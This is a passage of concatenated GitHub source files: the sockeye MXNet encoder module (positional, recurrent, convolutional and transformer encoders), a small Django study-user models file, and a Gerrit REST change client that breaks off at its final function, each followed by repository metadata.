               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        # Identity: no positional information is added.
        return data, data_length, seq_len
    def encode_positions(self,
                         positions: mx.sym.Symbol,
                         data: mx.sym.Symbol) -> mx.sym.Symbol:
        # Identity: positions are ignored.
        return data
    def get_num_hidden(self) -> int:
        """Return the (unchanged) representation size."""
        return self.num_embed
def _get_positional_embedding_params(positional_embedding_type: str,
                                     num_embed: int,
                                     max_seq_len: int,
                                     fixed_pos_embed_scale_up_input: bool = False,
                                     fixed_pos_embed_scale_down_positions: bool = False,
                                     prefix: str = '') -> Tuple[Callable, Dict]:
    """
    Map a positional embedding type to its encoder class and constructor kwargs.

    :raises ValueError: for an unknown positional embedding type.
    """
    factories = {
        C.FIXED_POSITIONAL_EMBEDDING: (
            AddSinCosPositionalEmbeddings,
            dict(num_embed=num_embed,
                 scale_up_input=fixed_pos_embed_scale_up_input,
                 scale_down_positions=fixed_pos_embed_scale_down_positions,
                 prefix=prefix)),
        C.LEARNED_POSITIONAL_EMBEDDING: (
            AddLearnedPositionalEmbeddings,
            dict(num_embed=num_embed,
                 max_seq_len=max_seq_len,
                 prefix=prefix)),
        C.NO_POSITIONAL_EMBEDDING: (
            NoOpPositionalEmbeddings,
            dict(num_embed=num_embed)),
    }
    if positional_embedding_type not in factories:
        raise ValueError("Unknown positional embedding type %s" % positional_embedding_type)
    return factories[positional_embedding_type]
def get_positional_embedding(positional_embedding_type: str,
                             num_embed: int,
                             max_seq_len: int,
                             fixed_pos_embed_scale_up_input: bool = False,
                             fixed_pos_embed_scale_down_positions: bool = False,
                             prefix: str = '') -> PositionalEncoder:
    """Instantiate a positional encoder of the requested type."""
    encoder_cls, encoder_kwargs = _get_positional_embedding_params(
        positional_embedding_type,
        num_embed,
        max_seq_len,
        fixed_pos_embed_scale_up_input=fixed_pos_embed_scale_up_input,
        fixed_pos_embed_scale_down_positions=fixed_pos_embed_scale_down_positions,
        prefix=prefix)
    return encoder_cls(**encoder_kwargs)
class EncoderSequence(Encoder):
    """
    A sequence of encoders is itself an encoder: input flows through each
    sub-encoder in order.

    :param encoders: List of encoders.
    :param dtype: Data type.
    """
    def __init__(self, encoders: List[Encoder], dtype: str = C.DTYPE_FP32) -> None:
        super().__init__(dtype)
        self.encoders = encoders
    def encode(self,
               data: mx.sym.Symbol,
               data_length: mx.sym.Symbol,
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Encodes data given sequence lengths of individual examples and maximum sequence length.

        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: Encoded versions of input data (data, data_length, seq_len).
        """
        # Each sub-encoder may transform all three values (e.g. pooling
        # encoders shorten the sequence).
        for sub_encoder in self.encoders:
            data, data_length, seq_len = sub_encoder.encode(data, data_length, seq_len)
        return data, data_length, seq_len
    def get_num_hidden(self) -> int:
        """Return the representation size of the final encoder in the chain."""
        return self.encoders[-1].get_num_hidden()
    def get_encoded_seq_len(self, seq_len: int) -> int:
        """Return the sequence length after all sub-encoders have been applied."""
        for sub_encoder in self.encoders:
            seq_len = sub_encoder.get_encoded_seq_len(seq_len)
        return seq_len
    def get_max_seq_len(self) -> Optional[int]:
        """
        :return: The smallest maximum-length restriction among the
                 sub-encoders, or None if none of them restricts length.
        """
        restrictions = [sub_encoder.get_max_seq_len()
                        for sub_encoder in self.encoders
                        if sub_encoder.get_max_seq_len() is not None]
        return min(restrictions) if restrictions else None
    def append(self, cls, infer_hidden: bool = False, **kwargs) -> Encoder:
        """
        Extends sequence with new Encoder. 'dtype' gets passed into Encoder instance if not present in parameters
        and supported by specific Encoder type.

        :param cls: Encoder type.
        :param infer_hidden: If number of hidden should be inferred from previous encoder.
        :param kwargs: Named arbitrary parameters for Encoder.
        :return: Instance of Encoder.
        """
        ctor_kwargs = dict(kwargs)
        if infer_hidden:
            ctor_kwargs['num_hidden'] = self.get_num_hidden()
        # Forward our dtype only to encoders whose constructor accepts one,
        # and only when the caller did not choose a dtype explicitly.
        accepted = inspect.signature(cls.__init__).parameters
        if 'dtype' in accepted and 'dtype' not in kwargs:
            ctor_kwargs['dtype'] = self.dtype
        new_encoder = cls(**ctor_kwargs)
        self.encoders.append(new_encoder)
        return new_encoder
class EmptyEncoder(Encoder):
    """
    This encoder ignores the input data and simply returns zero-filled states in the expected shape.

    :param config: configuration.
    """
    def __init__(self,
                 config: EmptyEncoderConfig) -> None:
        super().__init__(config.dtype)
        self.num_embed = config.num_embed
        self.num_hidden = config.num_hidden
    def encode(self,
               data: mx.sym.Symbol,
               data_length: Optional[mx.sym.Symbol],
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Encodes data given sequence lengths of individual examples and maximum sequence length.

        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: Expected number of empty states (zero-filled).
        """
        # Multiplying by an all-zero (num_embed, num_hidden) matrix yields
        # zeros of shape (batch_size, seq_len, num_hidden) while keeping the
        # output symbol connected to the input in the computation graph.
        zero_matrix = mx.sym.zeros((self.num_embed, self.num_hidden))
        zero_states = mx.sym.dot(data, zero_matrix)
        return zero_states, data_length, seq_len
    def get_num_hidden(self):
        """Return the representation size of this encoder."""
        return self.num_hidden
class RecurrentEncoder(Encoder):
    """
    Uni-directional (multi-layered) recurrent encoder.

    :param rnn_config: RNN configuration.
    :param prefix: Prefix for variable names.
    :param layout: Data layout.
    """
    def __init__(self,
                 rnn_config: rnn.RNNConfig,
                 prefix: str = C.STACKEDRNN_PREFIX,
                 layout: str = C.TIME_MAJOR) -> None:
        super().__init__(rnn_config.dtype)
        self.rnn_config = rnn_config
        self.layout = layout
        # A single (possibly multi-layer) stacked RNN cell shared by all
        # encode() calls.
        self.rnn = rnn.get_stacked_rnn(rnn_config, prefix)
    def encode(self,
               data: mx.sym.Symbol,
               data_length: Optional[mx.sym.Symbol],
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Encodes data given sequence lengths of individual examples and maximum sequence length.

        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: Encoded versions of input data (data, data_length, seq_len).
        """
        # Unroll over time; final states are discarded, only per-step
        # outputs are returned.
        hidden, _ = self.rnn.unroll(seq_len, inputs=data, merge_outputs=True, layout=self.layout)
        return hidden, data_length, seq_len
    def get_rnn_cells(self):
        """Return the RNNCells used in this encoder."""
        return [self.rnn]
    def get_num_hidden(self):
        """Return the representation size of this encoder."""
        return self.rnn_config.num_hidden
class BiDirectionalRNNEncoder(Encoder):
    """
    An encoder that runs a forward and a reverse RNN over input data.
    States from both RNNs are concatenated together.

    :param rnn_config: RNN configuration.
    :param prefix: Prefix for variable names.
    :param layout: Data layout.
    :param encoder_class: Recurrent encoder class to use.
    """
    def __init__(self,
                 rnn_config: rnn.RNNConfig,
                 prefix=C.BIDIRECTIONALRNN_PREFIX,
                 layout=C.TIME_MAJOR,
                 encoder_class: Callable = RecurrentEncoder) -> None:
        # Each direction gets num_hidden // 2 units so the concatenation of
        # both directions matches the requested num_hidden exactly.
        utils.check_condition(rnn_config.num_hidden % 2 == 0,
                              "num_hidden must be a multiple of 2 for BiDirectionalRNNEncoders.")
        super().__init__(rnn_config.dtype)
        self.rnn_config = rnn_config
        self.internal_rnn_config = rnn_config.copy(num_hidden=rnn_config.num_hidden // 2)
        if layout[0] == 'N':
            logger.warning("Batch-major layout for encoder input. Consider using time-major layout for faster speed")
        # time-major layout as _encode needs to swap layout for SequenceReverse
        self.forward_rnn = encoder_class(rnn_config=self.internal_rnn_config,
                                         prefix=prefix + C.FORWARD_PREFIX,
                                         layout=C.TIME_MAJOR)
        self.reverse_rnn = encoder_class(rnn_config=self.internal_rnn_config,
                                         prefix=prefix + C.REVERSE_PREFIX,
                                         layout=C.TIME_MAJOR)
        self.layout = layout
        self.prefix = prefix
    def encode(self,
               data: mx.sym.Symbol,
               data_length: mx.sym.Symbol,
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Encodes data given sequence lengths of individual examples and maximum sequence length.

        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: Encoded versions of input data (data, data_length, seq_len).
        """
        # _encode operates on time-major data; convert on the way in and out
        # when the configured layout is batch-major ('N...').
        if self.layout[0] == 'N':
            data = mx.sym.swapaxes(data=data, dim1=0, dim2=1)
        data = self._encode(data, data_length, seq_len)
        if self.layout[0] == 'N':
            data = mx.sym.swapaxes(data=data, dim1=0, dim2=1)
        return data, data_length, seq_len
    def _encode(self, data: mx.sym.Symbol, data_length: mx.sym.Symbol, seq_len: int) -> mx.sym.Symbol:
        """
        Bidirectionally encodes time-major data.
        """
        # Reverse each sequence only up to its true length, so padding stays
        # at the end for the reverse-direction RNN.
        # (seq_len, batch_size, num_embed)
        data_reverse = mx.sym.SequenceReverse(data=data, sequence_length=data_length,
                                              use_sequence_length=True)
        # (seq_length, batch, cell_num_hidden)
        hidden_forward, _, _ = self.forward_rnn.encode(data, data_length, seq_len)
        # (seq_length, batch, cell_num_hidden)
        hidden_reverse, _, _ = self.reverse_rnn.encode(data_reverse, data_length, seq_len)
        # Undo the reversal so forward and reverse states are aligned per
        # time step before concatenation.
        # (seq_length, batch, cell_num_hidden)
        hidden_reverse = mx.sym.SequenceReverse(data=hidden_reverse, sequence_length=data_length,
                                                use_sequence_length=True)
        # (seq_length, batch, 2 * cell_num_hidden)
        hidden_concat = mx.sym.concat(hidden_forward, hidden_reverse, dim=2, name="%s_rnn" % self.prefix)
        return hidden_concat
    def get_num_hidden(self) -> int:
        """
        Return the representation size of this encoder.
        """
        return self.rnn_config.num_hidden
    def get_rnn_cells(self) -> List[mx.rnn.BaseRNNCell]:
        """
        Returns a list of RNNCells used by this encoder.
        """
        return self.forward_rnn.get_rnn_cells() + self.reverse_rnn.get_rnn_cells()
class ConvolutionalEncoder(Encoder):
    """
    Encoder that uses convolution instead of recurrent connections, similar to Gehring et al. 2017.

    :param config: Configuration for convolutional encoder.
    :param prefix: Name prefix for operations in this encoder.
    """
    def __init__(self,
                 config: ConvolutionalEncoderConfig,
                 prefix: str = C.CNN_ENCODER_PREFIX) -> None:
        super().__init__(config.dtype)
        self.config = config
        # Weight for the input projection that makes residual additions
        # dimensionally compatible with the convolution blocks.
        self.i2h_weight = mx.sym.Variable('%si2h_weight' % prefix)
        # Convolution+GLU blocks are created once and shared over all
        # encode() calls.
        self.layers = []
        for layer_idx in range(config.num_layers):
            block = convolution.ConvolutionBlock(
                config.cnn_config,
                pad_type='centered',
                prefix="%s%d_" % (prefix, layer_idx))
            self.layers.append(block)
    def encode(self,
               data: mx.sym.Symbol,
               data_length: mx.sym.Symbol,
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Encodes data with a stack of Convolution+GLU blocks given sequence lengths of individual examples
        and maximum sequence length.

        :param data: Input data. Shape: (batch_size, seq_len, input_num_hidden).
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: Encoded version of the data.
        """
        # Project inputs to the convolution width: (batch_size, seq_len, num_hidden).
        hidden = mx.sym.FullyConnected(data=data,
                                       num_hidden=self.config.cnn_config.num_hidden,
                                       no_bias=True,
                                       flatten=False,
                                       weight=self.i2h_weight)
        # Stack of convolution blocks, each wrapped in a residual connection.
        for block in self.layers:
            hidden = hidden + block(hidden, data_length, seq_len)
        return hidden, data_length, seq_len
    def get_num_hidden(self) -> int:
        """Return the representation size of this encoder."""
        return self.config.cnn_config.num_hidden
class TransformerEncoder(Encoder):
    """
    Non-recurrent encoder based on the transformer architecture in:

    Attention Is All You Need, Figure 1 (left)
    Vaswani et al. (https://arxiv.org/pdf/1706.03762.pdf).

    :param config: Configuration for transformer encoder.
    :param prefix: Name prefix for operations in this encoder.
    """
    def __init__(self,
                 config: transformer.TransformerConfig,
                 prefix: str = C.TRANSFORMER_ENCODER_PREFIX) -> None:
        super().__init__(config.dtype)
        self.config = config
        self.prefix = prefix
        # One self-attention + feed-forward block per layer; shared over all
        # encode() calls of this instance.
        self.layers = [transformer.TransformerEncoderBlock(
            config, prefix="%s%d_" % (prefix, i)) for i in range(config.num_layers)]
        # Final pre/post-processing (per config.preprocess_sequence) applied
        # after the layer stack.
        self.final_process = transformer.TransformerProcessBlock(sequence=config.preprocess_sequence,
                                                                 dropout=config.dropout_prepost,
                                                                 prefix="%sfinal_process_" % prefix)
    def encode(self,
               data: mx.sym.Symbol,
               data_length: mx.sym.Symbol,
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Encodes data given sequence lengths of individual examples and maximum sequence length.

        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: Encoded versions of input data data, data_length, seq_len.
        """
        data = utils.cast_conditionally(data, self.dtype)
        if self.config.dropout_prepost > 0.0:
            data = mx.sym.Dropout(data=data, p=self.config.dropout_prepost)
        # Attention bias masking out positions beyond each sequence's true
        # length, broadcast over attention heads.
        # (batch_size * heads, 1, max_length)
        bias = mx.sym.expand_dims(transformer.get_variable_length_bias(lengths=data_length,
                                                                       max_length=seq_len,
                                                                       num_heads=self.config.attention_heads,
                                                                       fold_heads=True,
                                                                       name="%sbias" % self.prefix), axis=1)
        bias = utils.cast_conditionally(bias, self.dtype)
        for i, layer in enumerate(self.layers):
            # (batch_size, seq_len, config.model_size)
            data = layer(data, bias)
        data = self.final_process(data=data, prev=None)
        data = utils.uncast_conditionally(data, self.dtype)
        return data, data_length, seq_len
    def get_num_hidden(self) -> int:
        """
        Return the representation size of this encoder.
        """
        return self.config.model_size
class ConvolutionalEmbeddingConfig(config.Config):
    """
    Convolutional embedding encoder configuration.

    :param num_embed: Input embedding size.
    :param output_dim: Output segment embedding size. Defaults to the total
                       number of convolution filters when not given.
    :param max_filter_width: Maximum filter width for convolutions.
    :param num_filters: Number of filters of each width.
    :param pool_stride: Stride for pooling layer after convolutions.
    :param num_highway_layers: Number of highway layers for segment embeddings.
    :param dropout: Dropout probability.
    :param add_positional_encoding: Whether to add positional encodings to
                                    segment embeddings.
    :param dtype: Data type.
    """
    def __init__(self,
                 num_embed: int,
                 output_dim: Optional[int] = None,
                 max_filter_width: int = 8,
                 num_filters: Tuple[int, ...] = (200, 200, 250, 250, 300, 300, 300, 300),
                 pool_stride: int = 5,
                 num_highway_layers: int = 4,
                 dropout: float = 0.0,
                 add_positional_encoding: bool = False,
                 dtype: str = C.DTYPE_FP32) -> None:
        super().__init__()
        self.num_embed = num_embed
        self.output_dim = output_dim
        self.max_filter_width = max_filter_width
        self.num_filters = num_filters
        self.pool_stride = pool_stride
        self.num_highway_layers = num_highway_layers
        self.dropout = dropout
        self.add_positional_encoding = add_positional_encoding
        # Default the output dimension to the total filter count so the
        # encoder needs no extra projection layer.
        if self.output_dim is None:
            self.output_dim = sum(self.num_filters)
        self.dtype = dtype
class ConvolutionalEmbeddingEncoder(Encoder):
    """
    An encoder developed to map a sequence of character embeddings to a shorter sequence of segment
    embeddings using convolutional, pooling, and highway layers.  More generally, it maps a sequence
    of input embeddings to a sequence of span embeddings.

    * "Fully Character-Level Neural Machine Translation without Explicit Segmentation"
      Jason Lee; Kyunghyun Cho; Thomas Hofmann (https://arxiv.org/pdf/1610.03017.pdf)

    :param config: Convolutional embedding config.
    :param prefix: Name prefix for symbols of this encoder.
    """
    def __init__(self,
                 config: ConvolutionalEmbeddingConfig,
                 prefix: str = C.CHAR_SEQ_ENCODER_PREFIX) -> None:
        # One filter count is required per filter width 1..max_filter_width.
        utils.check_condition(len(config.num_filters) == config.max_filter_width,
                              "num_filters must have max_filter_width elements.")
        super().__init__(config.dtype)
        self.num_embed = config.num_embed
        self.output_dim = config.output_dim
        self.max_filter_width = config.max_filter_width
        # Defensive copy so later config mutation cannot affect this encoder.
        self.num_filters = config.num_filters[:]
        self.pool_stride = config.pool_stride
        self.num_highway_layers = config.num_highway_layers
        self.prefix = prefix
        self.dropout = config.dropout
        self.add_positional_encoding = config.add_positional_encoding
        # Convolution parameters, one weight/bias pair per filter width.
        self.conv_weight = {filter_width: mx.sym.Variable("%s%s%d%s" % (self.prefix, "conv_", filter_width, "_weight"))
                            for filter_width in range(1, self.max_filter_width + 1)}
        self.conv_bias = {filter_width: mx.sym.Variable("%s%s%d%s" % (self.prefix, "conv_", filter_width, "_bias"))
                          for filter_width in range(1, self.max_filter_width + 1)}
        # Optional projection from total filter count to output_dim.
        self.project_weight = mx.sym.Variable(self.prefix + "project_weight")
        self.project_bias = mx.sym.Variable(self.prefix + "project_bias")
        # Highway network parameters, one gate/transform pair per layer.
        self.gate_weight = [mx.sym.Variable("%s%s%d%s" % (self.prefix, "gate_", i, "_weight"))
                            for i in range(self.num_highway_layers)]
        self.gate_bias = [mx.sym.Variable("%s%s%d%s" % (self.prefix, "gate_", i, "_bias"))
                          for i in range(self.num_highway_layers)]
        self.transform_weight = [mx.sym.Variable("%s%s%d%s" % (self.prefix, "transform_", i, "_weight"))
                                 for i in range(self.num_highway_layers)]
        self.transform_bias = [mx.sym.Variable("%s%s%d%s" % (self.prefix, "transform_", i, "_bias"))
                               for i in range(self.num_highway_layers)]
    def encode(self,
               data: mx.sym.Symbol,
               data_length: mx.sym.Symbol,
               seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
        """
        Encodes data given sequence lengths of individual examples and maximum sequence length.

        :param data: Input data.
        :param data_length: Vector with sequence lengths.
        :param seq_len: Maximum sequence length.
        :return: Encoded versions of input data data, data_length, seq_len.
        """
        total_num_filters = sum(self.num_filters)
        encoded_seq_len = self.get_encoded_seq_len(seq_len)
        # (batch_size, channel=1, seq_len, num_embed)
        data = mx.sym.Reshape(data=data, shape=(-1, 1, seq_len, self.num_embed))
        # Convolution filters of width 1..N
        conv_outputs = []
        for filter_width, num_filter in enumerate(self.num_filters, 1):
            # "half" padding: output length == input length
            pad_before = ceil((filter_width - 1) / 2)
            pad_after = floor((filter_width - 1) / 2)
            # (batch_size, channel=1, seq_len + (filter_width - 1), num_embed)
            padded = mx.sym.pad(data=data,
                                mode="constant",
                                constant_value=0,
                                pad_width=(0, 0, 0, 0, pad_before, pad_after, 0, 0))
            # (batch_size, num_filter, seq_len, num_scores=1)
            conv = mx.sym.Convolution(data=padded,
                                      # cudnn_tune="off",
                                      kernel=(filter_width, self.num_embed),
                                      num_filter=num_filter,
                                      weight=self.conv_weight[filter_width],
                                      bias=self.conv_bias[filter_width])
            conv = mx.sym.Activation(data=conv, act_type="relu")
            conv_outputs.append(conv)
        # (batch_size, total_num_filters, seq_len, num_scores=1)
        conv_concat = mx.sym.concat(*conv_outputs, dim=1)
        # Max pooling with stride; pad so that seq_len is a multiple of the
        # pooling stride before pooling.
        uncovered = seq_len % self.pool_stride
        if uncovered > 0:
            pad_after = self.pool_stride - uncovered
            # (batch_size, total_num_filters, seq_len + pad_to_final_stride, num_scores=1)
            conv_concat = mx.sym.pad(data=conv_concat,
                                     mode="constant",
                                     constant_value=0,
                                     pad_width=(0, 0, 0, 0, 0, pad_after, 0, 0))
        # (batch_size, total_num_filters, seq_len/stride, num_scores=1)
        pool = mx.sym.Pooling(data=conv_concat,
                              pool_type="max",
                              kernel=(self.pool_stride, 1),
                              stride=(self.pool_stride, 1))
        # (batch_size, total_num_filters, seq_len/stride)
        pool = mx.sym.reshape(data=pool,
                              shape=(-1, total_num_filters, encoded_seq_len))
        # (batch_size, seq_len/stride, total_num_filters)
        pool = mx.sym.swapaxes(data=pool, dim1=1, dim2=2)
        if self.dropout > 0:
            pool = mx.sym.Dropout(data=pool, p=self.dropout)
        # Raw segment embeddings reshaped for highway network
        # (batch_size * seq_len/stride, total_num_filters)
        seg_embedding = mx.sym.Reshape(data=pool, shape=(-3, total_num_filters))
        # Projection layer if requested output dimension is different from total number of filters
        # (TransformerEncoder compatibility, not in original paper)
        if self.output_dim != total_num_filters:
            # (batch_size * seq_len/stride, output_dim)
            seg_embedding = mx.sym.FullyConnected(data=seg_embedding,
                                                  num_hidden=self.output_dim,
                                                  weight=self.project_weight,
                                                  bias=self.project_bias)
            seg_embedding = mx.sym.Activation(data=seg_embedding, act_type="relu")
            if self.dropout > 0:
                seg_embedding = mx.sym.Dropout(data=seg_embedding, p=self.dropout)
        # Highway network
        for i in range(self.num_highway_layers):
            # Gate
            gate = mx.sym.FullyConnected(data=seg_embedding,
                                         num_hidden=self.output_dim,
                                         weight=self.gate_weight[i],
                                         bias=self.gate_bias[i])
            gate = mx.sym.Activation(data=gate, act_type="sigmoid")
            if self.dropout > 0:
                gate = mx.sym.Dropout(data=gate, p=self.dropout)
            # Transform
            transform = mx.sym.FullyConnected(data=seg_embedding,
                                              num_hidden=self.output_dim,
                                              weight=self.transform_weight[i],
                                              bias=self.transform_bias[i])
            transform = mx.sym.Activation(data=transform, act_type="relu")
            if self.dropout > 0:
                transform = mx.sym.Dropout(data=transform, p=self.dropout)
            # Connection: gate blends transformed and untouched embeddings.
            seg_embedding = gate * transform + (1 - gate) * seg_embedding
        # (batch_size, seq_len/stride, output_dim) aka
        # (batch_size, encoded_seq_len, num_segment_embed)
        seg_embedding = mx.sym.Reshape(data=seg_embedding,
                                       shape=(-1, encoded_seq_len, self.output_dim))
        # Dropout on final segment embeddings
        if self.dropout > 0:
            seg_embedding = mx.sym.Dropout(data=seg_embedding, p=self.dropout)
        # Ceiling function isn't differentiable so this will throw errors if we
        # attempt to compute gradients.  Fortunately we aren't updating inputs
        # so we can just block the backward pass here.
        encoded_data_length = mx.sym.BlockGrad(mx.sym.ceil(data_length / self.pool_stride))
        return seg_embedding, encoded_data_length, encoded_seq_len
    def get_num_hidden(self) -> int:
        """
        Return the representation size of this encoder.
        """
        return self.output_dim
    def get_encoded_seq_len(self, seq_len: int) -> int:
        """
        Returns the size of the encoded sequence (shortened by the pool stride).
        """
        return int(ceil(seq_len / self.pool_stride))
# Type alias covering every supported encoder configuration variant.
EncoderConfig = Union[RecurrentEncoderConfig, transformer.TransformerConfig, ConvolutionalEncoderConfig,
                      EmptyEncoderConfig]
if ImageEncoderConfig is not None:
    # Image captioning support is optional; extend the alias only when its
    # config class could be imported.
    EncoderConfig = Union[EncoderConfig, ImageEncoderConfig]  # type: ignore
| {
"content_hash": "59116e25b34f8083c8e4696743578318",
"timestamp": "",
"source": "github",
"line_count": 1265,
"max_line_length": 119,
"avg_line_length": 41.95573122529644,
"alnum_prop": 0.5692994686663904,
"repo_name": "artemsok/sockeye",
"id": "95c313bb6d419aacf05ada826c4b6335cd603e1a",
"size": "53640",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sockeye/encoder.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "824"
},
{
"name": "Dockerfile",
"bytes": "1028"
},
{
"name": "JavaScript",
"bytes": "4196"
},
{
"name": "Python",
"bytes": "1548538"
},
{
"name": "Shell",
"bytes": "7456"
}
],
"symlink_target": ""
} |
from django.db import models
from django.contrib.auth.models import User
class StudyUserResearcher(models.Model):
    """A researcher user.

    Fields:
        user: OneToOne link to the Django User model.
    """
    # NOTE(review): Django >= 2.0 requires an explicit on_delete argument
    # here -- confirm the targeted Django version before upgrading.
    user = models.OneToOneField(User)
class StudyUserParticipant(models.Model):
    """A study participant.

    Fields:
        user: OneToOne link to the Django User model.
        is_enrolled: Boolean enrollment flag, default False.
    """
    # NOTE(review): Django >= 2.0 requires an explicit on_delete argument
    # here -- confirm the targeted Django version before upgrading.
    user = models.OneToOneField(User)
    is_enrolled = models.BooleanField(default=False)
| {
"content_hash": "588876769a3d9545963d67938491b050",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 52,
"avg_line_length": 22.73913043478261,
"alnum_prop": 0.6864244741873805,
"repo_name": "PersonalGenomesOrg/studyus-project",
"id": "ac345c32c18b9aa67c14b07e04fb4036c51f4f72",
"size": "523",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "studyus/studyuser/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7799"
}
],
"symlink_target": ""
} |
from requests import utils as requests_utils
from gerritclient.v1 import base
class ChangeClient(base.BaseV1Client):
    """Client for the Gerrit REST API '/changes/' endpoints.

    Each method issues one HTTP request through ``self.connection`` and
    returns the decoded response. Change identifiers are percent-encoded
    (including '/') before being placed in the URL.
    """

    api_path = "/changes/"

    def _change_path(self, change_id, suffix=""):
        """Build the request path for a single change.

        :param change_id: Identifier that uniquely identifies one change.
        :param suffix: Optional trailing path component, e.g. "/abandon".
        :return: Request path string.
        """
        return "{api_path}{change_id}{suffix}".format(
            api_path=self.api_path,
            change_id=requests_utils.quote(change_id, safe=''),
            suffix=suffix)

    def get_all(self, query, options=None, limit=None, skip=None):
        """Query changes.

        :param query: Queries as a list of string
        :param options: List of options to fetch additional data about changes
        :param limit: Int value that allows to limit the number of changes
                      to be included in the output results
        :param skip: Int value that allows to skip the given number of
                     changes from the beginning of the list
        :return A list of ChangeInfo entries
        """
        # Drop unset optional request parameters.
        params = {k: v for k, v in (('o', options),
                                    ('n', limit),
                                    ('S', skip)) if v is not None}
        request_path = "{api_path}?q={query}".format(
            api_path=self.api_path,
            query='&q='.join(query))
        return self.connection.get_request(request_path, params=params)

    def get_by_id(self, change_id, detailed=False, options=None):
        """Retrieve a change.

        :param change_id: Identifier that uniquely identifies one change.
        :param detailed: boolean value, if True then retrieve a change with
                         labels, detailed labels, detailed accounts,
                         reviewer updates, and messages.
        :param options: List of options to fetch additional data about a change
        :return: ChangeInfo entity is returned that describes the change.
        """
        params = {'o': options}
        request_path = self._change_path(change_id,
                                         "/detail" if detailed else "/")
        return self.connection.get_request(request_path, params=params)

    def create(self, data):
        """Create a new change."""
        return self.connection.post_request(self.api_path, json_data=data)

    def delete(self, change_id):
        """Delete a change."""
        return self.connection.delete_request(self._change_path(change_id),
                                              data={})

    def abandon(self, change_id):
        """Abandon a change."""
        return self.connection.post_request(
            self._change_path(change_id, "/abandon"), json_data={})

    def restore(self, change_id):
        """Restore a change."""
        return self.connection.post_request(
            self._change_path(change_id, "/restore"), json_data={})

    def revert(self, change_id, message=None):
        """Revert a change, optionally with a custom commit message."""
        data = {k: v for k, v in (('message', message),) if v is not None}
        return self.connection.post_request(
            self._change_path(change_id, "/revert"), json_data=data)

    def rebase(self, change_id, parent=None):
        """Rebase a change, optionally onto the given parent revision."""
        data = {k: v for k, v in (('base', parent),) if v is not None}
        return self.connection.post_request(
            self._change_path(change_id, "/rebase"), json_data=data)

    def move(self, change_id, branch, message=None):
        """Move a change to another destination branch."""
        data = {k: v for k, v in (('destination_branch', branch),
                                  ('message', message)) if v is not None}
        return self.connection.post_request(
            self._change_path(change_id, "/move"), json_data=data)

    def submit(self, change_id, on_behalf_of=None, notify=None):
        """Submit a change."""
        # TODO(vkulanov): add 'notify_details' field (parameter) support
        data = {k: v for k, v in (('on_behalf_of', on_behalf_of),
                                  ('notify', notify)) if v is not None}
        return self.connection.post_request(
            self._change_path(change_id, "/submit"), json_data=data)

    def get_topic(self, change_id):
        """Retrieve the topic of a change."""
        return self.connection.get_request(
            self._change_path(change_id, "/topic"))

    def set_topic(self, change_id, topic):
        """Set the topic of a change."""
        return self.connection.put_request(
            self._change_path(change_id, "/topic"),
            json_data={'topic': topic})

    def delete_topic(self, change_id):
        """Delete the topic of a change."""
        return self.connection.delete_request(
            self._change_path(change_id, "/topic"), data={})

    def get_assignee(self, change_id):
        """Retrieve the account of the user assigned to a change."""
        return self.connection.get_request(
            self._change_path(change_id, "/assignee"))

    def get_assignees(self, change_id):
        """Retrieve a list of every user ever assigned to a change."""
        return self.connection.get_request(
            self._change_path(change_id, "/past_assignees"))

    def set_assignee(self, change_id, account_id):
        """Set the assignee of a change."""
        return self.connection.put_request(
            self._change_path(change_id, "/assignee"),
            json_data={'assignee': account_id})

    def delete_assignee(self, change_id):
        """Delete the assignee of a change."""
        return self.connection.delete_request(
            self._change_path(change_id, "/assignee"), data={})

    def publish_draft(self, change_id):
        """Publish a draft change."""
        return self.connection.post_request(
            self._change_path(change_id, "/publish"), json_data={})

    def get_included(self, change_id):
        """Retrieve the branches and tags in which a change is included."""
        return self.connection.get_request(
            self._change_path(change_id, "/in"))

    def index(self, change_id):
        """Add or update the change in the secondary index."""
        return self.connection.post_request(
            self._change_path(change_id, "/index"), json_data={})

    def get_comments(self, change_id, comment_type=None):
        """List the published comments of all revisions of the change.

        :param change_id: Identifier that uniquely identifies one change.
        :param comment_type: Type of comments (None|'drafts'|'robotcomments')
                             None - published comments,
                             'drafts' - draft comments,
                             'robotcomments' - robotcomments.
        :return A list of CommentInfo entries.
        """
        # None/'' selects the default 'comments' sub-endpoint.
        suffix = "/" + (comment_type if comment_type else 'comments')
        return self.connection.get_request(
            self._change_path(change_id, suffix))

    def check_consistency(self, change_id):
        """Perform consistency checks on the change."""
        return self.connection.get_request(
            self._change_path(change_id, "/check"))

    def fix_consistency(self, change_id, is_delete=False,
                        expect_merged_as=False):
        """Perform consistency checks on the change and fixes any problems.

        :param change_id: Identifier that uniquely identifies one change.
        :param is_delete: If True, delete patch sets from the database
                          if they refer to missing commit options.
        :param expect_merged_as: If True, check that the change is merged into
                                 the destination branch as this exact SHA-1.
                                 If not, insert a new patch set referring to
                                 this commit.
        :return Returns a ChangeInfo entity with the problems field values
                that reflect any fixes.
        """
        data = {'delete_patch_set_if_commit_missing': is_delete,
                'expect_merged_as': expect_merged_as}
        return self.connection.post_request(
            self._change_path(change_id, "/check"), json_data=data)
def get_client(connection):
